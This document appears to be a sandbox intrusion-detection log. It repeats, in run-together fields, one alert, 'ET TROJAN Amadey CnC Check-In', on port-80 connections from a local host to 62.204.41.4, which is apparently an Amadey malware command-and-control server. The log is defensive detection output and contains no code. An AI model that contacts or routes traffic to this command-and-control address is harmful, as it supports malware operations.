                                                                      192.168.2.762.204.41.450096802027700 02/07/23-23:08:49.987228TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450390802027700 02/07/23-23:10:06.856141TCP2027700ET TROJAN Amadey CnC Check-In5039080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450166802027700 02/07/23-23:09:08.121536TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449743802027700 02/07/23-23:07:13.457751TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450264802027700 02/07/23-23:09:35.995836TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450433802027700 02/07/23-23:10:19.240532TCP2027700ET TROJAN Amadey CnC Check-In5043380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450080802027700 02/07/23-23:08:46.056281TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450077802027700 02/07/23-23:08:45.296740TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450007802027700 02/07/23-23:08:26.308602TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449874802027700 02/07/23-23:07:48.380254TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450334802027700 02/07/23-23:09:53.217371TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450363802027700 02/07/23-23:10:00.334134TCP2027700ET TROJAN Amadey CnC Check-In5036380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450245802027700 02/07/23-23:09:31.338382TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450458802027700 02/07/23-23:10:25.313774TCP2027700ET TROJAN Amadey CnC Check-In5045880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449940802027700 02/07/23-23:08:07.464494TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449785802027700 02/07/23-23:07:25.161286TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450008802027700 02/07/23-23:08:26.555660TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450150802027700 02/07/23-23:09:03.798728TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450452802027700 02/07/23-23:10:23.844381TCP2027700ET TROJAN Amadey CnC Check-In5045280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449969802027700 02/07/23-23:08:14.885714TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450064802027700 02/07/23-23:08:42.089378TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450208802027700 02/07/23-23:09:20.046231TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450162802027700 02/07/23-23:09:06.685785TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450119802027700 02/07/23-23:08:56.055732TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449944802027700 02/07/23-23:08:08.460141TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449861802027700 02/07/23-23:07:45.159848TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450379802027700 02/07/23-23:10:04.185148TCP2027700ET TROJAN Amadey CnC Check-In5037980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449855802027700 02/07/23-23:07:43.680992TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449953802027700 02/07/23-23:08:10.664703TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449769802027700 02/07/23-23:07:21.212903TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449858802027700 02/07/23-23:07:44.420398TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450051802027700 02/07/23-23:08:38.908724TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450175802027700 02/07/23-23:09:11.950103TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450449802027700 02/07/23-23:10:23.123641TCP2027700ET TROJAN Amadey CnC Check-In5044980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449772802027700 02/07/23-23:07:21.956084TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449842802027700 02/07/23-23:07:40.535003TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449931802027700 02/07/23-23:08:05.263417TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450277802027700 02/07/23-23:09:39.183924TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450106802027700 02/07/23-23:08:52.814624TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450153802027700 02/07/23-23:09:04.508859TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450420802027700 02/07/23-23:10:14.158819TCP2027700ET TROJAN Amadey CnC Check-In5042080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449788802027700 02/07/23-23:07:25.894312TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449699802027700 02/07/23-23:07:02.789716TCP2027700ET TROJAN Amadey CnC Check-In4969980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449802802027700 02/07/23-23:07:29.225910TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450130802027700 02/07/23-23:08:58.812897TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450225802027700 02/07/23-23:09:24.183239TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450047802027700 02/07/23-23:08:37.932300TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450399802027700 02/07/23-23:10:09.045857TCP2027700ET TROJAN Amadey CnC Check-In5039980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450188802027700 02/07/23-23:09:15.102934TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449976802027700 02/07/23-23:08:18.678576TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450403802027700 02/07/23-23:10:09.998024TCP2027700ET TROJAN Amadey CnC Check-In5040380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450258802027700 02/07/23-23:09:34.513209TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449798802027700 02/07/23-23:07:28.267776TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449740802027700 02/07/23-23:07:12.735380TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449891802027700 02/07/23-23:07:52.534100TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450436802027700 02/07/23-23:10:19.971883TCP2027700ET TROJAN Amadey CnC Check-In5043680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449835802027700 02/07/23-23:07:37.902416TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449719802027700 02/07/23-23:07:07.624988TCP2027700ET TROJAN Amadey CnC Check-In4971980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450261802027700 02/07/23-23:09:35.263577TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450215802027700 02/07/23-23:09:21.772162TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450083802027700 02/07/23-23:08:46.810774TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449986802027700 02/07/23-23:08:21.156437TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450120802027700 02/07/23-23:08:56.307442TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449845802027700 02/07/23-23:07:41.253266TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450014802027700 02/07/23-23:08:28.008248TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449881802027700 02/07/23-23:07:50.123193TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450037802027700 02/07/23-23:08:33.640087TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450202802027700 02/07/23-23:09:18.573599TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450462802027700 02/07/23-23:10:26.316744TCP2027700ET TROJAN Amadey CnC Check-In5046280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450248802027700 02/07/23-23:09:32.043752TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450284802027700 02/07/23-23:09:40.912417TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449871802027700 02/07/23-23:07:47.646611TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450413802027700 02/07/23-23:10:12.452915TCP2027700ET TROJAN Amadey CnC Check-In5041380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450027802027700 02/07/23-23:08:31.210464TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450321802027700 02/07/23-23:09:50.021531TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450198802027700 02/07/23-23:09:17.611552TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450376802027700 02/07/23-23:10:03.465876TCP2027700ET TROJAN Amadey CnC Check-In5037680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450024802027700 02/07/23-23:08:30.495661TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450205802027700 02/07/23-23:09:19.325527TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450057802027700 02/07/23-23:08:40.336371TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449729802027700 02/07/23-23:07:10.061030TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449907802027700 02/07/23-23:07:59.344645TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450235802027700 02/07/23-23:09:27.132915TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449989802027700 02/07/23-23:08:21.900932TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449848802027700 02/07/23-23:07:41.988753TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450426802027700 02/07/23-23:10:15.811820TCP2027700ET TROJAN Amadey CnC Check-In5042680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450271802027700 02/07/23-23:09:37.717475TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450100802027700 02/07/23-23:08:51.207785TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450093802027700 02/07/23-23:08:49.276435TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450129802027700 02/07/23-23:08:58.570310TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449730802027700 02/07/23-23:07:10.313178TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450307802027700 02/07/23-23:09:46.569596TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450389802027700 02/07/23-23:10:06.609151TCP2027700ET TROJAN Amadey CnC Check-In5038980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450139802027700 02/07/23-23:09:01.006926TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450228802027700 02/07/23-23:09:24.958282TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449710802027700 02/07/23-23:07:05.446086TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450090802027700 02/07/23-23:08:48.540226TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449973802027700 02/07/23-23:08:16.792891TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450311802027700 02/07/23-23:09:47.562395TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450396802027700 02/07/23-23:10:08.320217TCP2027700ET TROJAN Amadey CnC Check-In5039680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449884802027700 02/07/23-23:07:50.864770TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450044802027700 02/07/23-23:08:37.214832TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450222802027700 02/07/23-23:09:23.463165TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450133802027700 02/07/23-23:08:59.557977TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449795802027700 02/07/23-23:07:27.539097TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449838802027700 02/07/23-23:07:39.576743TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450406802027700 02/07/23-23:10:10.747493TCP2027700ET TROJAN Amadey CnC Check-In5040680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449927802027700 02/07/23-23:08:04.272110TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450317802027700 02/07/23-23:09:49.028783TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449726802027700 02/07/23-23:07:09.303743TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449720802027700 02/07/23-23:07:07.869855TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450475802027700 02/07/23-23:10:29.511990TCP2027700ET TROJAN Amadey CnC Check-In5047580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450149802027700 02/07/23-23:09:03.555507TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450238802027700 02/07/23-23:09:28.505872TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449749802027700 02/07/23-23:07:14.642908TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449904802027700 02/07/23-23:07:57.181548TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450380802027700 02/07/23-23:10:04.421525TCP2027700ET TROJAN Amadey CnC Check-In5038080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449815802027700 02/07/23-23:07:32.330392TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450327802027700 02/07/23-23:09:51.514149TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450429802027700 02/07/23-23:10:17.103178TCP2027700ET TROJAN Amadey CnC Check-In5042980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450291802027700 02/07/23-23:09:42.607617TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450297802027700 02/07/23-23:09:44.097128TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450400802027700 02/07/23-23:10:09.283191TCP2027700ET TROJAN Amadey CnC Check-In5040080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449822802027700 02/07/23-23:07:34.022866TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450386802027700 02/07/23-23:10:05.891433TCP2027700ET TROJAN Amadey CnC Check-In5038680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449911802027700 02/07/23-23:08:00.309877TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449736802027700 02/07/23-23:07:11.796309TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449996802027700 02/07/23-23:08:23.620454TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449825802027700 02/07/23-23:07:34.754203TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450110802027700 02/07/23-23:08:53.827948TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449917802027700 02/07/23-23:08:01.811545TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449739802027700 02/07/23-23:07:12.501529TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450370802027700 02/07/23-23:10:02.050258TCP2027700ET TROJAN Amadey CnC Check-In5037080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449999802027700 02/07/23-23:08:24.351919TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449828802027700 02/07/23-23:07:35.504498TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450416802027700 02/07/23-23:10:13.181627TCP2027700ET TROJAN Amadey CnC Check-In5041680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450281802027700 02/07/23-23:09:40.172674TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450192802027700 02/07/23-23:09:16.124888TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450021802027700 02/07/23-23:08:29.768912TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449901802027700 02/07/23-23:07:55.355595TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449723802027700 02/07/23-23:07:08.598238TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450212802027700 02/07/23-23:09:21.026369TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449983802027700 02/07/23-23:08:20.411480TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450123802027700 02/07/23-23:08:57.096759TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449812802027700 02/07/23-23:07:31.595526TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450383802027700 02/07/23-23:10:05.178762TCP2027700ET TROJAN Amadey CnC Check-In5038380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449894802027700 02/07/23-23:07:53.270341TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450301802027700 02/07/23-23:09:45.082072TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450472802027700 02/07/23-23:10:28.781018TCP2027700ET TROJAN Amadey CnC Check-In5047280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450419802027700 02/07/23-23:10:13.897365TCP2027700ET TROJAN Amadey CnC Check-In5041980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449914802027700 02/07/23-23:08:01.055769TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450294802027700 02/07/23-23:09:43.344390TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450034802027700 02/07/23-23:08:32.903823TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450329802027700 02/07/23-23:09:52.020233TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449906802027700 02/07/23-23:07:58.951742TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450295802027700 02/07/23-23:09:43.610527TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450099802027700 02/07/23-23:08:50.963558TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449872802027700 02/07/23-23:07:47.908431TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450038802027700 02/07/23-23:08:34.135275TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450234802027700 02/07/23-23:09:26.686624TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450430802027700 02/07/23-23:10:18.142734TCP2027700ET TROJAN Amadey CnC Check-In5043080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449811802027700 02/07/23-23:07:31.352080TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449967802027700 02/07/23-23:08:14.132869TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450172802027700 02/07/23-23:09:11.243219TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449844802027700 02/07/23-23:07:41.013550TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449939802027700 02/07/23-23:08:07.214342TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450066802027700 02/07/23-23:08:42.558660TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450267802027700 02/07/23-23:09:36.717040TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450463802027700 02/07/23-23:10:26.545692TCP2027700ET TROJAN Amadey CnC Check-In5046380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449816802027700 02/07/23-23:07:32.564007TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450144802027700 02/07/23-23:09:02.280526TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450239802027700 02/07/23-23:09:29.333776TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449934802027700 02/07/23-23:08:05.990363TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450262802027700 02/07/23-23:09:35.513958TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449738802027700 02/07/23-23:07:12.270875TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450357802027700 02/07/23-23:09:58.872294TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450340802027700 02/07/23-23:09:54.719055TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449721802027700 02/07/23-23:07:08.117512TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449990802027700 02/07/23-23:08:22.153608TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450352802027700 02/07/23-23:09:57.641139TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449733802027700 02/07/23-23:07:11.073843TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450000802027700 02/07/23-23:08:24.592012TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450407802027700 02/07/23-23:10:11.016581TCP2027700ET TROJAN Amadey CnC Check-In5040780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450082802027700 02/07/23-23:08:46.560439TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449782802027700 02/07/23-23:07:24.432492TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450435802027700 02/07/23-23:10:19.733664TCP2027700ET TROJAN Amadey CnC Check-In5043580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449754802027700 02/07/23-23:07:15.855344TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449705802027700 02/07/23-23:07:04.226733TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450324802027700 02/07/23-23:09:50.786571TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450290802027700 02/07/23-23:09:42.372267TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450373802027700 02/07/23-23:10:02.763122TCP2027700ET TROJAN Amadey CnC Check-In5037380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450116802027700 02/07/23-23:08:55.305221TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.762.204.41.4
